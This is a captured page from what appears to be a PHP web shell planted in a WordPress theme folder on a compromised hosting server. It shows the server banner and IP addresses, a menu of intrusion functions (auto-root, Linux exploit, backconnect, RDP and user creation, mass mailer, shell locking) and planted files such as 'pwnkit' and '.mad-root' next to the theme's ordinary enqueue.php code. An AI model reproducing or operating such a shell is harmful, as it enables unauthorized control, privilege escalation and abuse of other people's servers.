Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
arrival /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
hooks
[ DIR ]
drwxr-xr-x
welcome
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
arrival-contents.php
2.58
KB
-rw-r--r--
dynamic-styles.php
18.1
KB
-rw-r--r--
enqueue.php
4.05
KB
-rw-r--r--
image-sizes.php
2.1
KB
-rw-r--r--
jetpack.php
1.39
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
template-functions.php
22.27
KB
-rw-r--r--
template-tags.php
9.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enqueue.php
<?php /** * Enqueue styles. */ function arrival_styles() { // Add custom fonts, used in the main stylesheet. wp_enqueue_style( 'arrival-fonts', arrival_fonts_url(), array(), null ); // phpcs:ignore WordPress.WP.EnqueuedResourceParameters.MissingVersion if( class_exists('woocommerce')){ wp_enqueue_style( 'arrival-woo-styles', get_theme_file_uri( '/assets/css/woo-styles.css' ), array(), ARRIVAL_VER ); } wp_enqueue_style( 'slick', get_theme_file_uri( '/assets/lib/slick/slick.css' ), array(), ARRIVAL_VER ); wp_enqueue_style( 'slick-theme', get_theme_file_uri( '/assets/lib/slick/slick-theme.css' ), array(), ARRIVAL_VER ); //jarallax wp_enqueue_style( 'jquery-jarallax', get_theme_file_uri( '/assets/lib/jarallax/jarallax.css' ), array(), ARRIVAL_VER ); wp_enqueue_style( 'ionicons', get_theme_file_uri( '/assets/lib/ionicons/css/ionicons.min.css' ), array(), ARRIVAL_VER ); // Enqueue main stylesheet. wp_enqueue_style( 'arrival-base-style', get_stylesheet_uri(), array(), ARRIVAL_VER ); // Register component styles that are printed as needed. wp_register_style( 'arrival-comments', get_theme_file_uri( '/assets/css/comments.css' ), array(), ARRIVAL_VER ); wp_enqueue_style( 'arrival-content', get_theme_file_uri( '/assets/css/content.css' ), array(), ARRIVAL_VER ); wp_register_style( 'arrival-widgets', get_theme_file_uri( '/assets/css/widgets.css' ), array(), ARRIVAL_VER ); wp_register_style( 'arrival-front-page', get_theme_file_uri( '/assets/css/front-page.css' ), array(), ARRIVAL_VER ); wp_enqueue_style( 'arrival-responsive', get_theme_file_uri('/assets/css/responsive.css'), array(), ARRIVAL_VER ); wp_style_add_data( 'arrival-base-style', 'rtl', 'replace' ); } add_action( 'wp_enqueue_scripts', 'arrival_styles' ); /** * Enqueue scripts. */ function arrival_scripts() { $default = arrival_get_default_theme_options(); $arrival_one_page_menus = get_theme_mod('arrival_one_page_menus', $default['arrival_one_page_menus']); $_blog_layout = get_theme_mod('arrival_blog_layout', $default['arrival_blog_layout']); $_smooth_scroll_enable = get_theme_mod('arrival_smooth_scroll_enable', $default['arrival_smooth_scroll_enable']); // If the AMP plugin is active, return early. if ( arrival_is_amp() ) { return; } wp_enqueue_script( 'arrival-wooButtons', get_theme_file_uri( '/assets/js/wooButtons.js' ), array('jquery'),ARRIVAL_VER, false ); wp_enqueue_script( 'slick', get_theme_file_uri( '/assets/lib/slick/slick.min.js' ), ARRIVAL_VER, false ); wp_enqueue_script( 'jquery-fitvids', get_theme_file_uri( '/assets/lib/jquery-fitvids/jquery.fitvids.js' ), array('jquery'), ARRIVAL_VER, false ); if( 'yes' == $_smooth_scroll_enable ){ wp_enqueue_script( 'smoothscroll', get_theme_file_uri( '/assets/lib/smoothscroll/smoothscroll.min.js' ), array('jquery'), ARRIVAL_VER, false ); } if( $arrival_one_page_menus == 'yes' ){ wp_enqueue_script( 'jquery-nav', get_theme_file_uri( '/assets/lib/onepagenav/jquery.nav.js' ), array('jquery'), ARRIVAL_VER, false ); } //enqueue jarallax script wp_enqueue_script( 'jarallax', get_theme_file_uri( '/assets/lib/jarallax/jarallax.min.js' ), array('jquery'), ARRIVAL_VER, false ); // Enqueue skip-link-focus script. wp_enqueue_script( 'arrival-skip-link-focus-fix', get_theme_file_uri( '/assets/js/skip-link-focus-fix.js' ), array('jquery'), ARRIVAL_VER, false ); wp_script_add_data( 'arrival-skip-link-focus-fix', 'defer', true ); wp_register_script( 'arrival-scripts', get_theme_file_uri( '/assets/js/custom-scripts.js' ), array('jquery'), ARRIVAL_VER, false ); $script_vals = array( 'onepagenav' => $arrival_one_page_menus, 'smoothscroll' => $_smooth_scroll_enable ); wp_localize_script('arrival-scripts','arrival_loc_script',$script_vals ); wp_enqueue_script('arrival-scripts'); // Enqueue comment script on singular post/page views only. if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } } add_action( 'wp_enqueue_scripts', 'arrival_scripts' );
Close